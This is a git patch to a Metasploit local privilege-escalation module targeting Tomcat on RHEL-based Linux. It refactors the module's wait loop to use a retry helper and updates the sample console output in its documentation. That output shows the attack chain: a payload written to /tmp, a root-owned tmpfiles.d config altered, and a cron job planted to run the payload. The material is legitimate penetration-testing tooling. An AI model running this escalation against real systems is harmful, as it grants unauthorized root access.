From 62d43a6e9677a393cd61ba6412c39760d505de68 Mon Sep 17 00:00:00 2001 From: h00die Date: Sat, 28 Jan 2023 07:44:53 -0500 Subject: [PATCH] use exploit retry function --- .../local/tomcat_rhel_based_temp_priv_esc.md | 5 ++++- .../local/tomcat_rhel_based_temp_priv_esc.rb | 18 ++++++------------ 2 files changed, 10 insertions(+), 13 deletions(-) diff --git a/documentation/modules/exploit/linux/local/tomcat_rhel_based_temp_priv_esc.md b/documentation/modules/exploit/linux/local/tomcat_rhel_based_temp_priv_esc.md index 2aa2113ca9..b9f69f78c0 100644 --- a/documentation/modules/exploit/linux/local/tomcat_rhel_based_temp_priv_esc.md +++ b/documentation/modules/exploit/linux/local/tomcat_rhel_based_temp_priv_esc.md @@ -133,7 +133,10 @@ msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > exploit [*] Writing '/tmp/.4ptbf6f4fW' (1068640 bytes) ... [*] Writing permission elevation into /usr/lib/tmpfiles.d/tomcat.conf [*] Creating cron job in /etc/cron.d/grPwZ -[+] Waiting 1800 on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create) +[+] Waiting 1800 seconds on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create) +[*] Sleeping for 2 seconds before attempting again +[*] Sleeping for 4 seconds before attempting again +[*] Sleeping for 8 seconds before attempting again [-] /etc/cron.d/grPwZ not found, checking in 10 seconds [*] Waiting on cron to kick the payload (~1 minute) [+] Deleted /tmp/.4ptbf6f4fW diff --git a/modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb b/modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb index 5a52a3fd59..539aefa96e 100644 --- a/modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb +++ b/modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb @@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking + include Msf::Exploit::Retry include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::File @@ -155,24 +156,17 @@ class MetasploitModule < Msf::Exploit::Local register_file_for_cleanup(cron_job) # we now need systemd-tmpfiles to restart - print_good("Waiting #{datastore['WfsDelay']} on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)") - timer = 0 - while timer < datastore['WfsDelay'] - if file? cron_job - break - end - - print_error("#{cron_job} not found, checking in 10 seconds") - Rex.sleep(10) - timer += 10 + print_good("Waiting #{datastore['WfsDelay']} seconds on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)") + succeeded = retry_until_truthy(timeout: datastore['WfsDelay']) do + file? cron_job end - unless file? cron_job + unless succeeded print_error("#{cron_job} not found, exploit aborted") return end - print_status('Waiting on cron to kick the payload (~1 minute)') + print_status('Waiting on cron to execute the payload (~1 minute)') end def cleanup